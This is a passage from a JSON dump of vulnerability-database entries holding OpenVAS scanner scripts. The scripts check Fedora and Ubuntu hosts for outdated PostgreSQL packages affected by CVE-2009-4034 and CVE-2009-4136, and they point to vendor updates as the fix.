8.4.2, for various fixes described at\nhttp://www.postgresql.org/docs/8.4/static/release-8-4-2.html\nincluding two security issues\nRelated: #546321\nRelated: #547662\n- Use -N not the obsolete -n in useradd call\nResolves: #495727\n- Clean up specfile to eliminate rpmlint gripes, mainly by removing\nno-longer-needed provisions for superseding rh-postgresql\n- add sparc/sparc64 to multilib header support\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update postgresql' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13381\";\ntag_summary = \"The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13381.\";\n\n\n\nif(description)\n{\n script_id(66569);\n script_version(\"$Revision: 6624 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:11:55 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4136\", \"CVE-2009-4034\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Core 12 FEDORA-2009-13381 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=546321\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=547662\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plperl\", rpm:\"postgresql-plperl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plpython\", rpm:\"postgresql-plpython~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pltcl\", rpm:\"postgresql-pltcl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.4.2~1.fc12\", rls:\"FC12\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-04-06T11:40:31", "references": ["https://bugzilla.redhat.com/show_bug.cgi?id=546321", "https://bugzilla.redhat.com/show_bug.cgi?id=547662"], "pluginID": "136141256231066566", "description": "The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13363.", "edition": 1, "reporter": "Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com", "published": "2009-12-30T00:00:00", "type": "openvas", "title": "Fedora Core 11 FEDORA-2009-13363 (postgresql)", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2018-04-06T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231066566", "id": "OPENVAS:136141256231066566", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: fcore_2009_13363.nasl 9350 2018-04-06 07:03:33Z cfischer $\n# Description: Auto-generated from advisory FEDORA-2009-13363 (postgresql)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Update Information:\n\nUpdate to latest upstream point releases\n\nChangeLog:\n\n* Wed Dec 16 2009 Tom Lane 8.3.9-1\n- Update to PostgreSQL 8.3.9, for various fixes described at\nhttp://www.postgresql.org/docs/8.3/static/release-8-3-9.html\nincluding two security issues\nRelated: #546321\nRelated: #547662\";\ntag_solution = \"Apply the appropriate updates.\n\nThis update can be installed with the yum update program. Use \nsu -c 'yum update postgresql' at the command line.\nFor more information, refer to Managing Software with yum,\navailable at http://docs.fedoraproject.org/yum/.\n\nhttps://secure1.securityspace.com/smysecure/catid.html?in=FEDORA-2009-13363\";\ntag_summary = \"The remote host is missing an update to postgresql\nannounced via advisory FEDORA-2009-13363.\";\n\n\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.66566\");\n script_version(\"$Revision: 9350 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:03:33 +0200 (Fri, 06 Apr 2018) $\");\n script_tag(name:\"creation_date\", value:\"2009-12-30 21:58:43 +0100 (Wed, 30 Dec 2009)\");\n script_cve_id(\"CVE-2009-4136\", \"CVE-2009-4034\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_name(\"Fedora Core 11 FEDORA-2009-13363 (postgresql)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2009 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=546321\");\n script_xref(name : \"URL\" , value : \"https://bugzilla.redhat.com/show_bug.cgi?id=547662\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-rpm.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isrpmvuln(pkg:\"postgresql\", rpm:\"postgresql~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-contrib\", rpm:\"postgresql-contrib~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-devel\", rpm:\"postgresql-devel~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-docs\", rpm:\"postgresql-docs~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-libs\", rpm:\"postgresql-libs~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plperl\", rpm:\"postgresql-plperl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-plpython\", rpm:\"postgresql-plpython~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-pltcl\", rpm:\"postgresql-pltcl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-python\", rpm:\"postgresql-python~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-server\", rpm:\"postgresql-server~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-tcl\", rpm:\"postgresql-tcl~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-test\", rpm:\"postgresql-test~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\nif ((res = isrpmvuln(pkg:\"postgresql-debuginfo\", rpm:\"postgresql-debuginfo~8.3.9~1.fc11\", rls:\"FC11\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 6.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-04T11:18:16", "references": ["http://www.ubuntu.com/usn/usn-876-1/", "876-1"], "pluginID": "840360", "description": "Ubuntu Update for Linux kernel vulnerabilities USN-876-1", "edition": 3, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-01-15T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 10.0}}, "title": "Ubuntu Update for PostgreSQL vulnerabilities USN-876-1", "type": "openvas", "naslFamily": "Ubuntu Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4034", "CVE-2009-4136"], "modified": "2017-12-01T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=840360", "id": "OPENVAS:840360", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_876_1.nasl 7965 2017-12-01 07:38:25Z santu $\n#\n# Ubuntu Update for PostgreSQL vulnerabilities USN-876-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"It was discovered that PostgreSQL did not properly handle certificates with\n NULL characters in the Common Name field of X.509 certificates. An attacker\n could exploit this to perform a man in the middle attack to view sensitive\n information or alter encrypted communications. (CVE-2009-4034)\n\n It was discovered that PostgreSQL did not properly manage session-local\n state. A remote authenticated user could exploit this to escalate\n priviliges within PostgreSQL. (CVE-2009-4136)\";\n\ntag_summary = \"Ubuntu Update for Linux kernel vulnerabilities USN-876-1\";\ntag_affected = \"PostgreSQL vulnerabilities on Ubuntu 6.06 LTS ,\n Ubuntu 8.04 LTS ,\n Ubuntu 8.10 ,\n Ubuntu 9.04 ,\n Ubuntu 9.10\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name: \"URL\" , value: \"http://www.ubuntu.com/usn/usn-876-1/\");\n script_id(840360);\n script_version(\"$Revision: 7965 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-01 08:38:25 +0100 (Fri, 01 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-01-15 10:29:41 +0100 (Fri, 15 Jan 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"USN\", value: \"876-1\");\n script_cve_id(\"CVE-2009-4034\", \"CVE-2009-4136\");\n script_name(\"Ubuntu Update for PostgreSQL vulnerabilities USN-876-1\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\");\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"UBUNTU9.04\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu9.04\", rls:\"UBUNTU9.04\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU6.06 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat2\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg5\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes2\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq4\", ver:\"8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.1_8.1.19-0ubuntu0.6.06\", rls:\"UBUNTU6.06 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu8.10\", rls:\"UBUNTU8.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU8.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg-dev\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libecpg6\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpgtypes3\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq-dev\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libpq5\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plperl\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-plpython\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-pltcl\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-server-dev\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-client\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-contrib\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3_8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql-doc\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"postgresql\", ver:\"8.3.9-0ubuntu8.04\", rls:\"UBUNTU8.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"UBUNTU9.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libecpg-compat3\", ver:\"8.4.2-0ubuntu9.10\", rls:\"UBUNTU9.10\")) != NULL)\n {\n 